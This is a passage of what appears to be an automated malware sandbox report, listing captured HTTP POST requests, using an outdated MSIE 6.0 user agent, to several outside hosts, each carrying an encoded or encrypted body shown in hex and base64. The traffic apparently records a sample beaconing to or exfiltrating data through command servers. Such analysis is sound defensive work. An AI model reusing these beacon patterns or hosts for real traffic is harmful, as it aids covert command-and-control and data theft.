4f 39 4c 39 36 6a 5a 50 75 4a 41 61 36 63 52 31 45 5a 37 62 6b 33 74 41 74 39 6e 5a 6a 45 6c 34 74 76 78 67 71 48 6c 4f 64 53 45 74 30 51 70 50 48 52 4b 41 73 32 6c 76 65 76 4e 63 42 77 43 34 4e 61 69 63 53 45 74 42 30 52 4c 31 73 5a 49 4a 57 73 43 59 44 51 69 63 37 68 58 69 2b 4c 33 39 79 72 2f 74 6a 49 38 77 73 6f 2b 6a 59 72 50 71 33 68 66 4a 50 6c 32 2f 66 59 53 52 61 6f 51 47 37 57 79 33 59 48 4e 34 36 31 65 2b 4e 37 4c 34 42 45 45 48 45 2f 67 68 57 4e 6f 67 79 4e 46 69 62 77 56 66 4c 47 62 59 39 69 78 53 62 71 33 52 68 57 49 73 69 44 38 78 4c 4d 4f 76 6e 44 46 63 79 79 61 61 78 71 67 47 4c 62 4a 41 7a 61 67 37 58 62 75 6f 2b 31 70 63 42 64 74 66 73 61 2b 38 52 72 67 78 50 67 62 6d 6d 47 56 54 71 35 4f 48 2f 65 35 70 78 2b 50 4f 53 73 6c 6b 45 2b 64 45 50 70 45 75 75 74 4a 39 36 35 2f 6d 69 6c 72 32 76 42 62 71 71 66 67 33 34 31 6a 39 4d 2f 6d 63 71 54 57 6b 78 61 73 30 4a 4b 72 53 34 31 65 4c 59 52 72 6c 6d 67 6d 68 78 59 5a 4f 66 55 39 46 6a 4f 56 67 63 32 4b 33 62 7a 6d 6f 34 58 72 49 71 4c 58 69 65 62 6f 59 31 53 4d 31 4e 63 6f 6e 35 51 59 71 4b 4c 55 65 44 37 4b 35 5a 4d 6e 75 71 67 74 78 42 51 3d Data Ascii: 3hGZuW33NP95Z2iyZPFZdiauCrVbU2B+8XbByggjr/+g3Rp4GuYx7qwus7qTiFuzRvvW95U5tH5e6k4xc333sFQiIU9XF+32f/pG5rCMBmtrn9zPhLW3suvesqhglPztOsKZlFoZB9BF95x11dKDX3w3fiqo7WkhYxy/q5Qxvu5BU4vGjffNGKRPNKvwVb8EksFO5qM6/IpDZO9L96jZPuJAa6cR1EZ7bk3tAt9nZjEl4tvxgqHlOdSEt0QpPHRKAs2lvevNcBwC4NaicSEtB0RL1sZIJWsCYDQic7hXi+L39yr/tjI8wso+jYrPq3hfJPl2/fYSRaoQG7Wy3YHN461e+N7L4BEEHE/ghWNogyNFibwVfLGbY9ixSbq3RhWIsiD8xLMOvnDFcyyaaxqgGLbJAzag7Xbuo+1pcBdtfsa+8RrgxPgbmmGVTq5OH/e5px+POSslkE+dEPpEuutJ965/milr2vBbqqfg341j9M/mcqTWkxas0JKrS41eLYRrlmgmhxYZOfU9FjOVgc2K3bzmo4XrIqLXieboY1SM1Ncon5QYqKLUeD7K5ZMnuqgtxBQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 33 68 47 5a 75 57 33 33 4e 50 39 35 5a 32 69 79 5a 50 46 5a 64 69 61 75 43 72 56 62 55 32 42 2b 38 58 62 42 79 67 67 6a 72 2f 2b 67 33 52 70 34 47 75 59 78 37 71 77 75 73 37 71 54 69 46 75 7a 52 76 76 57 39 35 55 35 74 48 35 65 36 6b 34 78 63 33 33 33 73 46 51 69 49 55 39 58 46 2b 33 32 66 2f 70 47 35 72 43 4d 42 6d 74 72 6e 39 7a 50 68 4c 57 33 73 75 76 65 73 71 68 67 6c 50 7a 74 4f 73 4b 5a 6c 46 6f 5a 42 39 42 46 39 35 78 31 31 64 4b 44 58 33 77 33 66 69 71 6f 37 57 6b 68 59 78 79 2f 71 35 51 78 76 75 35 42 55 34 76 47 6a 66 66 4e 47 4b 52 50 4e 4b 76 77 56 62 38 45 6b 73 46 4f 35 71 4d 36 2f 49 70 44 5a 4f 39 4c 39 36 6a 5a 50 75 4a 41 61 36 63 52 31 45 5a 37 62 6b 33 74 41 74 39 6e 5a 6a 45 6c 34 74 76 78 67 71 48 6c 4f 64 53 45 74 30 51 70 50 48 52 4b 41 73 32 6c 76 65 76 4e 63 42 77 43 34 4e 61 69 63 53 45 74 42 30 52 4c 31 73 5a 49 4a 57 73 43 59 44 51 69 63 37 68 58 69 2b 4c 33 39 79 72 2f 74 6a 49 38 77 73 6f 2b 6a 59 72 50 71 33 68 66 4a 50 6c 32 2f 66 59 53 52 61 6f 51 47 37 57 79 33 59 48 4e 34 36 31 65 2b 4e 37 4c 34 42 45 45 48 45 2f 67 68 57 4e 6f 67 79 4e 46 69 62 77 56 66 4c 47 62 59 39 69 78 53 62 71 33 52 68 57 49 73 69 44 38 78 4c 4d 4f 76 6e 44 46 63 79 79 61 61 78 71 67 47 4c 62 4a 41 7a 61 67 37 58 62 75 6f 2b 31 70 63 42 64 74 66 73 61 2b 38 52 72 67 78 50 67 62 6d 6d 47 56 54 71 35 4f 48 2f 65 35 70 78 2b 50 4f 53 73 6c 6b 45 2b 64 45 50 70 45 75 75 74 4a 39 36 35 2f 6d 69 6c 72 32 76 42 62 71 71 66 67 33 34 31 6a 39 4d 2f 6d 63 71 54 57 6b 78 61 73 30 4a 4b 72 53 34 31 65 4c 59 52 72 6c 6d 67 6d 68 78 59 5a 4f 66 55 39 46 6a 4f 56 67 63 32 4b 33 62 7a 6d 6f 34 58 72 49 71 4c 58 69 65 62 6f 59 31 53 4d 31 4e 63 6f 6e 35 51 59 71 4b 4c 55 65 44 37 4b 35 5a 4d 6e 75 71 67 74 78 42 51 3d Data Ascii: 3hGZuW33NP95Z2iyZPFZdiauCrVbU2B+8XbByggjr/+g3Rp4GuYx7qwus7qTiFuzRvvW95U5tH5e6k4xc333sFQiIU9XF+32f/pG5rCMBmtrn9zPhLW3suvesqhglPztOsKZlFoZB9BF95x11dKDX3w3fiqo7WkhYxy/q5Qxvu5BU4vGjffNGKRPNKvwVb8EksFO5qM6/IpDZO9L96jZPuJAa6cR1EZ7bk3tAt9nZjEl4tvxgqHlOdSEt0QpPHRKAs2lvevNcBwC4NaicSEtB0RL1sZIJWsCYDQic7hXi+L39yr/tjI8wso+jYrPq3hfJPl2/fYSRaoQG7Wy3YHN461e+N7L4BEEHE/ghWNogyNFibwVfLGbY9ixSbq3RhWIsiD8xLMOvnDFcyyaaxqgGLbJAzag7Xbuo+1pcBdtfsa+8RrgxPgbmmGVTq5OH/e5px+POSslkE+dEPpEuutJ965/milr2vBbqqfg341j9M/mcqTWkxas0JKrS41eLYRrlmgmhxYZOfU9FjOVgc2K3bzmo4XrIqLXieboY1SM1Ncon5QYqKLUeD7K5ZMnuqgtxBQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 30 57 32 35 63 57 46 43 51 2f 2b 67 55 61 53 34 77 50 6a 45 65 6a 72 56 79 54 4a 66 43 7a 4e 42 4a 64 66 51 75 59 2b 78 35 6d 33 4f 6e 78 4e 74 36 41 30 69 47 39 6c 6c 46 37 70 61 55 6e 75 47 67 47 6f 73 57 70 69 73 63 78 54 2f 4e 54 63 30 6e 45 35 42 4a 67 34 49 71 4f 45 45 69 48 59 71 39 67 74 37 4c 55 6b 75 34 50 57 65 33 32 74 63 43 69 44 4c 42 6f 57 58 6d 4b 49 53 63 45 53 69 63 71 6a 38 41 71 59 79 45 54 41 71 71 7a 6b 6a 6c 55 56 4a 62 63 75 2b 4f 69 59 69 63 32 37 79 72 55 5a 51 4d 31 4d 51 78 2f 44 35 57 49 77 55 2f 74 4c 4f 44 77 59 32 65 39 53 6e 61 67 36 4d 54 45 4b 41 57 42 50 30 44 35 35 58 4d 41 53 32 74 38 4f 70 4d 46 75 30 2f 69 75 7a 6d 33 6b 43 75 6d 4e 6b 56 71 5a 39 31 4e 59 6b 71 56 53 61 33 71 51 73 75 6c 70 78 76 50 2b 6b 73 35 47 55 34 48 33 73 70 50 65 48 72 52 2b 5a 30 78 42 73 51 55 30 4d 6a 66 46 4d 36 73 57 45 4a 67 41 55 41 31 67 65 53 6a 76 30 62 49 4d 4e 32 6c 38 6b 65 44 62 65 77 44 42 71 48 58 45 6a 59 41 42 48 46 39 54 53 61 58 6c 6a 42 48 35 66 2f 45 62 73 64 38 57 79 55 74 4a 54 71 46 61 57 44 6e 67 57 57 76 64 53 4e 41 39 6e 6e 66 44 68 79 6a 47 47 2f 44 65 44 4b 68 6a 2b 59 55 53 71 36 76 67 48 32 74 62 35 39 36 76 66 69 4c 72 6a 42 62 64 37 42 55 5a 68 33 69 4b 74 43 45 77 51 75 7a 4b 69 45 2b 31 4d 38 67 77 4e 4a 37 68 56 35 32 45 70 58 58 61 41 74 6a 39 75 63 46 52 44 44 31 2b 6b 52 50 6b 45 6d 49 51 30 34 43 32 4d 62 4f 58 47 42 53 79 43 6b 7a 4a 6e 6a 71 65 34 4e 6b 33 4d 2f 50 33 72 42 46 74 58 6c 6d 32 64 70 72 36 54 52 59 6b 56 41 56 37 52 50 2b 4a 73 39 4b 46 4e 6f 62 63 44 33 35 37 67 37 66 2b 74 79 67 31 67 78 53 46 58 6d 5a 49 67 47 58 4f 51 37 42 4a 2f 6d 61 35 35 74 34 74 58 6d 45 39 36 4b 62 71 2b 32 5a 46 34 45 46 6e 55 Data Ascii: 0W25cWFCQ/+gUaS4wPjEejrVyTJfCzNBJdfQuY+x5m3OnxNt6A0iG9llF7paUnuGgGosWpiscxT/NTc0nE5BJg4IqOEEiHYq9gt7LUku4PWe32tcCiDLBoWXmKIScESicqj8AqYyETAqqzkjlUVJbcu+OiYic27yrUZQM1MQx/D5WIwU/tLODwY2e9Snag6MTEKAWBP0D55XMAS2t8OpMFu0/iuzm3kCumNkVqZ91NYkqVSa3qQsulpxvP+ks5GU4H3spPeHrR+Z0xBsQU0MjfFM6sWEJgAUA1geSjv0bIMN2l8keDbewDBqHXEjYABHF9TSaXljBH5f/Ebsd8WyUtJTqFaWDngWWvdSNA9nnfDhyjGG/DeDKhj+YUSq6vgH2tb596vfiLrjBbd7BUZh3iKtCEwQuzKiE+1M8gwNJ7hV52EpXXaAtj9ucFRDD1+kRPkEmIQ04C2MbOXGBSyCkzJnjqe4Nk3M/P3rBFtXlm2dpr6TRYkVAV7RP+Js9KFNobcD357g7f+tyg1gxSFXmZIgGXOQ7BJ/ma55t4tXmE96Kbq+2ZF4EFnU
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 43 4e 6e 75 6b 64 77 2b 58 66 39 61 52 39 2f 34 42 38 79 79 66 6d 2b 36 6c 65 4c 30 54 45 4e 6f 30 4e 56 2b 35 4d 66 62 49 70 44 32 37 58 51 39 77 31 69 30 4d 33 55 62 56 63 50 77 53 32 74 4d 6f 65 64 39 72 6f 2b 65 32 69 42 4c 4e 6e 6c 6a 70 37 4a 72 45 58 51 2f 4e 59 37 35 5a 47 66 58 44 5a 57 55 56 57 63 2b 36 69 45 44 69 7a 46 58 39 77 4e 68 63 47 6f 53 6f 59 43 54 42 44 76 51 79 62 36 68 6b 41 76 4c 2b 49 6a 31 56 61 6b 4b 63 6c 74 2f 32 5a 58 4d 62 66 51 2b 45 39 2b 74 4e 64 61 30 71 70 52 70 56 34 74 68 41 33 4e 65 39 45 56 4b 2f 50 51 63 51 43 50 4a 74 79 39 70 62 45 43 78 6c 54 72 76 63 76 70 44 66 54 4f 6b 39 73 4b 61 4e 6b 6f 42 71 51 35 45 4a 6a 32 62 31 35 2b 51 6e 34 49 6f 64 79 51 66 4f 42 73 6a 65 72 4b 42 54 67 72 58 72 52 59 56 32 2f 33 4d 59 4a 53 33 32 4d 62 31 63 58 63 33 75 6f 69 39 47 77 55 38 39 71 31 6f 41 6b 41 6b 37 65 6e 2b 67 72 6a 44 46 47 7a 7a 68 38 57 56 2f 48 65 77 37 63 4a 73 42 53 4f 41 74 59 48 30 49 6d 4b 65 36 2f 4f 2b 42 49 49 50 74 77 56 53 5a 57 54 70 53 34 66 73 39 66 43 70 73 4c 48 38 67 34 42 73 48 30 47 53 68 6e 52 70 6b 72 49 70 33 36 64 44 65 71 4c 76 51 42 6a 6c 67 73 57 66 56 45 73 43 31 59 62 73 75 58 65 37 39 39 44 59 42 78 31 49 6a 4f 4b 47 31 6f 75 36 36 48 34 52 6f 34 44 6e 38 72 52 72 4d 6c 45 46 69 53 75 4c 53 47 66 34 74 55 79 73 44 46 32 62 71 74 41 54 66 6b 36 2b 48 54 64 65 5a 41 45 55 6b 59 45 45 39 52 70 65 55 73 70 50 37 2b 39 6a 52 79 58 59 68 73 79 46 47 51 76 42 75 48 6a 4d 51 72 36 71 65 52 4d 35 70 39 48 69 4a 6c 45 48 73 32 44 42 4f 30 33 36 30 42 62 6f 4b 47 64 30 32 64 44 36 4f 6d 64 42 35 51 3d 3d Data Ascii: CNnukdw+Xf9aR9/4B8yyfm+6leL0TENo0NV+5MfbIpD27XQ9w1i0M3UbVcPwS2tMoed9ro+e2iBLNnljp7JrEXQ/NY75ZGfXDZWUVWc+6iEDizFX9wNhcGoSoYCTBDvQyb6hkAvL+Ij1VakKclt/2ZXMbfQ+E9+tNda0qpRpV4thA3Ne9EVK/PQcQCPJty9pbECxlTrvcvpDfTOk9sKaNkoBqQ5EJj2b15+Qn4IodyQfOBsjerKBTgrXrRYV2/3MYJS32Mb1cXc3uoi9GwU89q1oAkAk7en+grjDFGzzh8WV/Hew7cJsBSOAtYH0ImKe6/O+BIIPtwVSZWTpS4fs9fCpsLH8g4BsH0GShnRpkrIp36dDeqLvQBjlgsWfVEsC1YbsuXe799DYBx1IjOKG1ou66H4Ro4Dn8rRrMlEFiSuLSGf4tUysDF2bqtATfk6+HTdeZAEUkYEE9RpeUspP7+9jRyXYhsyFGQvBuHjMQr6qeRM5p9HiJlEHs2DBO0360BboKGd02dD6OmdB5Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 43 4e 6e 75 6b 64 77 2b 58 66 39 61 52 39 2f 34 42 38 79 79 66 6d 2b 36 6c 65 4c 30 54 45 4e 6f 30 4e 56 2b 35 4d 66 62 49 70 44 32 37 58 51 39 77 31 69 30 4d 33 55 62 56 63 50 77 53 32 74 4d 6f 65 64 39 72 6f 2b 65 32 69 42 4c 4e 6e 6c 6a 70 37 4a 72 45 58 51 2f 4e 59 37 35 5a 47 66 58 44 5a 57 55 56 57 63 2b 36 69 45 44 69 7a 46 58 39 77 4e 68 63 47 6f 53 6f 59 43 54 42 44 76 51 79 62 36 68 6b 41 76 4c 2b 49 6a 31 56 61 6b 4b 63 6c 74 2f 32 5a 58 4d 62 66 51 2b 45 39 2b 74 4e 64 61 30 71 70 52 70 56 34 74 68 41 33 4e 65 39 45 56 4b 2f 50 51 63 51 43 50 4a 74 79 39 70 62 45 43 78 6c 54 72 76 63 76 70 44 66 54 4f 6b 39 73 4b 61 4e 6b 6f 42 71 51 35 45 4a 6a 32 62 31 35 2b 51 6e 34 49 6f 64 79 51 66 4f 42 73 6a 65 72 4b 42 54 67 72 58 72 52 59 56 32 2f 33 4d 59 4a 53 33 32 4d 62 31 63 58 63 33 75 6f 69 39 47 77 55 38 39 71 31 6f 41 6b 41 6b 37 65 6e 2b 67 72 6a 44 46 47 7a 7a 68 38 57 56 2f 48 65 77 37 63 4a 73 42 53 4f 41 74 59 48 30 49 6d 4b 65 36 2f 4f 2b 42 49 49 50 74 77 56 53 5a 57 54 70 53 34 66 73 39 66 43 70 73 4c 48 38 67 34 42 73 48 30 47 53 68 6e 52 70 6b 72 49 70 33 36 64 44 65 71 4c 76 51 42 6a 6c 67 73 57 66 56 45 73 43 31 59 62 73 75 58 65 37 39 39 44 59 42 78 31 49 6a 4f 4b 47 31 6f 75 36 36 48 34 52 6f 34 44 6e 38 72 52 72 4d 6c 45 46 69 53 75 4c 53 47 66 34 74 55 79 73 44 46 32 62 71 74 41 54 66 6b 36 2b 48 54 64 65 5a 41 45 55 6b 59 45 45 39 52 70 65 55 73 70 50 37 2b 39 6a 52 79 58 59 68 73 79 46 47 51 76 42 75 48 6a 4d 51 72 36 71 65 52 4d 35 70 39 48 69 4a 6c 45 48 73 32 44 42 4f 30 33 36 30 42 62 6f 4b 47 64 30 32 64 44 36 4f 6d 64 42 35 51 3d 3d Data Ascii: CNnukdw+Xf9aR9/4B8yyfm+6leL0TENo0NV+5MfbIpD27XQ9w1i0M3UbVcPwS2tMoed9ro+e2iBLNnljp7JrEXQ/NY75ZGfXDZWUVWc+6iEDizFX9wNhcGoSoYCTBDvQyb6hkAvL+Ij1VakKclt/2ZXMbfQ+E9+tNda0qpRpV4thA3Ne9EVK/PQcQCPJty9pbECxlTrvcvpDfTOk9sKaNkoBqQ5EJj2b15+Qn4IodyQfOBsjerKBTgrXrRYV2/3MYJS32Mb1cXc3uoi9GwU89q1oAkAk7en+grjDFGzzh8WV/Hew7cJsBSOAtYH0ImKe6/O+BIIPtwVSZWTpS4fs9fCpsLH8g4BsH0GShnRpkrIp36dDeqLvQBjlgsWfVEsC1YbsuXe799DYBx1IjOKG1ou66H4Ro4Dn8rRrMlEFiSuLSGf4tUysDF2bqtATfk6+HTdeZAEUkYEE9RpeUspP7+9jRyXYhsyFGQvBuHjMQr6qeRM5p9HiJlEHs2DBO0360BboKGd02dD6OmdB5Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 4e 57 6f 42 2b 55 6a 33 54 2f 39 59 62 52 44 77 69 7a 49 4e 4e 72 74 46 75 42 2f 51 32 34 68 47 2f 50 35 75 32 4d 66 4e 63 6e 53 69 70 4d 51 59 7a 74 41 4e 30 42 4e 77 41 53 75 6a 2f 50 6a 63 74 47 4e 39 34 54 4c 32 35 6f 33 43 55 58 70 41 51 73 70 47 7a 67 68 4a 4f 63 74 66 46 34 78 61 4a 31 6f 78 71 37 43 49 57 33 78 6d 64 62 61 30 34 6d 5a 4a 4b 73 55 6a 4b 61 68 70 79 62 50 65 63 4f 4e 59 4e 4a 58 37 75 61 4f 68 72 78 58 78 63 51 79 54 75 44 4a 4d 7a 4e 44 76 32 53 73 76 55 68 7a 39 6f 7a 61 35 42 69 65 31 39 53 34 57 79 4f 37 71 55 59 41 31 72 30 38 64 75 4f 2f 56 49 2f 38 76 70 59 75 53 45 49 73 47 4a 49 34 68 6d 78 67 2f 65 77 4a 53 43 72 55 66 45 36 43 73 37 6b 4a 70 77 4d 43 73 52 35 33 32 49 34 5a 6c 38 49 34 31 62 33 63 58 2f 54 63 53 76 53 6c 45 6b 70 33 39 45 6e 45 71 52 77 51 4a 44 46 6d 48 78 48 67 6a 2f 38 2b 50 72 57 75 6e 79 41 30 41 44 69 6f 50 50 69 48 72 56 54 4b 4d 68 41 54 66 65 6c 4c 56 2b 58 51 77 68 6c 50 33 6e 63 42 45 44 45 4d 48 42 57 6b 78 7a 38 6a 66 4a 2f 75 74 6a 46 65 2b 6a 53 59 6d 4b 30 5a 78 50 50 34 33 49 4f 58 42 6b 37 4c 63 53 49 4b 6b 70 7a 42 38 49 79 41 67 39 72 45 4b 62 57 4b 6b 77 73 54 43 54 4f 30 39 57 66 75 46 2f 31 5a 71 2f 32 50 2f 66 51 31 52 37 57 61 57 2f 74 57 75 61 68 79 53 71 6a 35 2f 31 49 62 55 6e 49 4a 39 44 76 52 56 4a 6d 6b 68 7a 6e 4b 52 69 2f 72 74 74 6b 32 42 65 4d 43 59 35 38 78 34 47 45 46 53 64 4a 49 79 52 30 33 63 46 45 6a 51 77 49 33 6e 77 6f 33 37 56 73 38 43 58 57 61 79 46 4a 59 74 42 6c 34 4d 6f 2f 72 70 52 38 61 6c 6e 61 37 54 76 33 68 4f 62 44 4a 51 37 62 41 2b 6d 65 2f 76 58 66 74 4c 72 41 74 6a 77 71 36 44 57 7a 52 39 76 42 45 7a 66 51 4f 4e 2f 63 58 55 70 78 2b 35 35 36 58 35 39 4f 55 66 35 6c 67 3d Data Ascii: NWoB+Uj3T/9YbRDwizINNrtFuB/Q24hG/P5u2MfNcnSipMQYztAN0BNwASuj/PjctGN94TL25o3CUXpAQspGzghJOctfF4xaJ1oxq7CIW3xmdba04mZJKsUjKahpybPecONYNJX7uaOhrxXxcQyTuDJMzNDv2SsvUhz9oza5Bie19S4WyO7qUYA1r08duO/VI/8vpYuSEIsGJI4hmxg/ewJSCrUfE6Cs7kJpwMCsR532I4Zl8I41b3cX/TcSvSlEkp39EnEqRwQJDFmHxHgj/8+PrWunyA0ADioPPiHrVTKMhATfelLV+XQwhlP3ncBEDEMHBWkxz8jfJ/utjFe+jSYmK0ZxPP43IOXBk7LcSIKkpzB8IyAg9rEKbWKkwsTCTO09WfuF/1Zq/2P/fQ1R7WaW/tWuahySqj5/1IbUnIJ9DvRVJmkhznKRi/rttk2BeMCY58x4GEFSdJIyR03cFEjQwI3nwo37Vs8CXWayFJYtBl4Mo/rpR8alna7Tv3hObDJQ7bA+me/vXftLrAtjwq6DWzR9vBEzfQON/cXUpx+556X59OUf5lg=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 70 41 44 56 52 62 67 6c 53 76 2b 53 64 5a 68 59 4f 79 30 79 62 61 73 74 45 54 30 41 63 2b 62 57 62 42 7a 35 64 39 73 54 43 30 73 51 46 53 31 6b 6a 49 50 55 78 55 50 72 38 4d 36 5a 76 64 38 4a 65 35 56 34 32 58 38 54 79 77 37 35 6c 39 6b 5a 4d 4a 55 6c 4c 4d 31 62 70 38 76 52 51 34 76 53 68 63 30 35 58 2f 4b 32 2b 6a 6c 39 77 76 63 57 36 6b 53 50 76 6c 45 52 35 58 6d 4a 54 79 63 41 75 76 43 70 4b 78 36 37 4a 49 2b 55 34 74 33 6a 6b 78 4c 6e 47 74 6b 66 79 7a 45 79 30 74 62 4e 56 30 4c 6d 6e 43 6a 7a 43 6c 65 6e 79 31 5a 69 6b 63 35 31 52 33 47 30 61 36 42 41 76 4a 6b 56 32 73 41 33 2f 43 6f 43 33 67 65 73 70 53 64 63 70 58 62 79 79 48 48 35 6c 73 59 52 6e 6f 58 47 37 68 44 68 35 6c 75 39 69 70 42 7a 72 32 54 79 47 71 67 65 4c 71 61 73 67 73 55 32 65 77 71 36 66 6c 46 58 5a 65 39 56 39 56 49 2f 76 37 6f 55 77 63 76 68 69 79 51 57 67 63 30 4e 6c 56 39 7a 68 35 65 68 62 4e 4a 34 42 41 57 4c 79 33 54 4f 6b 6f 78 56 6c 4d 31 6c 54 46 6b 4f 2f 41 35 61 77 55 32 6d 50 38 33 72 72 4e 32 6d 2f 46 79 4c 4c 49 79 78 37 6e 5a 4c 48 6a 74 64 4d 44 66 58 67 33 70 47 6c 65 67 6b 78 6d 47 54 6d 70 47 2f 52 38 47 30 6c 6c 6f 56 74 6d 46 35 4f 66 6b 36 78 2b 57 39 57 42 49 44 71 51 70 49 55 36 4d 36 51 68 54 50 38 4f 38 53 6b 65 73 6a 52 34 76 63 73 57 45 77 38 67 44 41 71 5a 49 33 66 6e 44 61 76 32 46 68 38 6a 39 2b 30 74 45 45 77 6c 63 6d 31 48 53 34 63 47 38 52 53 47 4e 47 75 61 6b 2b 45 39 57 43 4d 76 77 33 78 70 42 68 70 4c 50 52 76 59 32 65 55 41 4a 61 30 41 69 76 54 4d 58 44 61 68 54 4a 6b 30 34 51 77 4f 39 43 78 2b 37 77 58 65 54 4b 37 70 62 36 35 6d 32 2f 79 6e 66 35 71 58 58 71 65 31 49 59 32 6f 6c 71 5a 4f 38 68 37 39 34 6d 4d 76 39 77 71 59 66 55 72 64 6e 44 45 51 36 34 6e 79 75 41 4f 66 71 56 4b 34 72 41 6b 74 6b 57 73 66 6c 74 58 68 56 43 35 66 55 79 Data Ascii: pADVRbglSv+SdZhYOy0ybastET0Ac+bWbBz5d9sTC0sQFS1kjIPUxUPr8M6Zvd8Je5V42X8Tyw75l9kZMJUlLM1bp8vRQ4vShc05X/K2+jl9wvcW6kSPvlER5XmJTycAuvCpKx67JI+U4t3jkxLnGtkfyzEy0tbNV0LmnCjzCleny1Zikc51R3G0a6BAvJkV2sA3/CoC3gespSdcpXbyyHH5lsYRnoXG7hDh5lu9ipBzr2TyGqgeLqasgsU2ewq6flFXZe9V9VI/v7oUwcvhiyQWgc0NlV9zh5ehbNJ4BAWLy3TOkoxVlM1lTFkO/A5awU2mP83rrN2m/FyLLIyx7nZLHjtdMDfXg3pGlegkxmGTmpG/R8G0lloVtmF5Ofk6x+W9WBIDqQpIU6M6QhTP8O8SkesjR4vcsWEw8gDAqZI3fnDav2Fh8j9+0tEEwlcm1HS4cG8RSGNGuak+E9WCMvw3xpBhpLPRvY2eUAJa0AivTMXDahTJk04QwO9Cx+7wXeTK7pb65m2/ynf5qXXqe1IY2olqZO8h794mMv9wqYfUrdnDEQ64nyuAOfqVK4rAktkWsfltXhVC5fUy
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 74 42 42 79 6c 6d 46 6b 58 66 38 73 58 73 34 41 77 4c 4b 6b 4e 7a 70 4c 51 68 68 66 52 62 30 48 4a 52 46 4c 62 32 6e 51 4f 5a 7a 41 72 30 50 4e 70 54 4a 65 41 6d 53 50 70 35 52 57 4b 75 38 4e 48 43 68 2b 6a 72 63 77 74 6f 4b 43 41 2f 2b 74 78 74 51 65 4b 47 31 46 79 6c 65 6d 4b 33 33 69 65 45 53 33 30 6e 35 2f 66 6e 67 70 32 73 57 68 2f 67 54 2f 77 48 4f 37 47 44 30 52 78 49 6e 6f 77 4a 47 61 71 55 74 54 32 6a 31 67 46 73 54 39 4d 63 2b 53 4a 63 56 68 65 66 70 57 76 39 33 76 51 41 74 71 50 49 64 43 37 55 75 4d 44 4c 68 78 35 75 75 75 62 4a 38 4e 52 54 74 73 72 57 75 50 56 6f 54 48 73 49 61 42 74 49 7a 5a 62 78 4f 72 43 76 71 54 68 58 6c 75 67 72 38 75 37 4f 34 6b 73 58 49 42 32 49 61 68 4f 36 73 59 75 78 32 78 6a 4c 37 64 70 4d 38 4f 32 35 67 53 36 6b 65 69 4c 59 75 54 58 4a 70 58 71 45 47 4c 4b 6d 39 50 53 63 30 37 78 36 57 48 63 71 57 74 32 37 4c 72 70 32 7a 6c 4a 39 78 37 2b 4a 53 44 43 78 62 62 51 4b 32 4d 70 55 55 49 4d 46 2f 70 55 6c 51 4f 34 4d 69 73 75 78 31 6a 65 76 6b 38 6e 68 63 49 54 70 61 4b 59 66 62 69 34 6a 78 49 52 72 77 6b 44 6c 71 78 58 6f 49 6a 54 63 4c 57 55 38 31 5a 49 42 54 71 58 30 52 6c 4d 71 31 42 62 72 66 30 44 2b 4f 55 68 4b 78 71 47 70 70 31 47 6c 57 6a 71 65 73 70 49 68 71 59 57 61 74 2b 4f 45 34 36 59 79 54 54 67 35 79 31 6b 71 78 59 47 73 5a 4a 55 46 44 4d 55 41 6d 71 44 4f 48 57 6c 6f 2b 55 38 7a 42 73 73 4b 70 72 35 59 61 42 44 54 70 51 78 65 2f 44 5a 4e 62 2f 46 4f 54 53 4c 77 73 59 6e 2f 66 67 2b 61 6e 78 4a 4d 53 4e 63 48 59 59 79 47 72 4e 65 61 73 62 74 36 5a 6c 6d 38 65 6c 35 33 2b 2f 69 59 70 66 36 39 76 49 46 33 68 63 45 44 72 35 41 51 34 31 47 70 48 43 56 6b 2f 54 34 77 3d 3d Data Ascii: tBBylmFkXf8sXs4AwLKkNzpLQhhfRb0HJRFLb2nQOZzAr0PNpTJeAmSPp5RWKu8NHCh+jrcwtoKCA/+txtQeKG1FylemK33ieES30n5/fngp2sWh/gT/wHO7GD0RxInowJGaqUtT2j1gFsT9Mc+SJcVhefpWv93vQAtqPIdC7UuMDLhx5uuubJ8NRTtsrWuPVoTHsIaBtIzZbxOrCvqThXlugr8u7O4ksXIB2IahO6sYux2xjL7dpM8O25gS6keiLYuTXJpXqEGLKm9PSc07x6WHcqWt27Lrp2zlJ9x7+JSDCxbbQK2MpUUIMF/pUlQO4Misux1jevk8nhcITpaKYfbi4jxIRrwkDlqxXoIjTcLWU81ZIBTqX0RlMq1Bbrf0D+OUhKxqGpp1GlWjqespIhqYWat+OE46YyTTg5y1kqxYGsZJUFDMUAmqDOHWlo+U8zBssKpr5YaBDTpQxe/DZNb/FOTSLwsYn/fg+anxJMSNcHYYyGrNeasbt6Zlm8el53+/iYpf69vIF3hcEDr5AQ41GpHCVk/T4w==
